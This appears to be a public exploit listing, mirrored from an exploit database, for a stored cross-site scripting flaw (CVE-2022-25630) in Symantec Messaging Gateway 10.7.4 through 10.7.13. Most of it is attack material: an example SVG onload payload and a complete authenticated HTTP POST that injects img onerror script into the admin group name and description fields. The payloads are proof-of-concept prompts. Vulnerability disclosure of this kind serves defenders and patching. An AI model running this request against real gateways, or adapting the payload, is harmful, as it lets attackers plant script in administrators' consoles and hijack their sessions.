Share
## https://sploitus.com/exploit?id=PACKETSTORM:171781
# Exploit Title: Symantec Messaging Gateway 10.7.4 - Stored Cross-Site Scripting (XSS)  
# Exploit Author: omurugur  
# Vendor Homepage: https://support.broadcom.com/external/content/SecurityAdvisories/0/21117  
# Version: 10.7.4-10.7.13  
# Tested on: [relevant os]  
# CVE : CVE-2022-25630  
# Author Web: https://www.justsecnow.com  
# Author Social: @omurugurrr  
  
  
An authenticated user can embed malicious content with XSS into the admin  
group policy page.  
  
Example payload  
  
*"/><svg/onload=prompt(document.domain)>*  
  
  
POST /brightmail/admin/administration/AdminGroupPolicyFlow$save.flo  
HTTP/1.1  
Host: X.X.X.X  
Cookie: JSESSIONID=xxxxx  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0)  
Gecko/20100101 Firefox/99.0  
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 652  
Origin: https://x.x.x.x  
Referer:  
https://x.x.x.x/brightmail/admin/administration/AdminGroupPolicyFlow$add.flo  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
Te: trailers  
Connection: close  
  
pageReuseFor=add&symantec.brightmail.key.TOKEN=xxx&adminGroupName=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28location%29%3E&adminGroupDescription=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28location%29%3E&adminGroupDescription=&fullAdminRole=true&statusRole=true&statusViewOnly=false&reportRole=true&reportViewOnly=false&policyRole=true&policyViewOnly=false&settingRole=true&settingViewOnly=false&adminRole=true&adminViewOnly=false&submitRole=true&submitViewOnly=false&quarantineRole=true&quarantineViewOnly=false&selectedFolderRights=2&ids=0&complianceFolderIds=1&selectedFolderRights=2&ids=0&complianceFolderIds=10000000  
  
  
Regards,  
  
Omur UGUR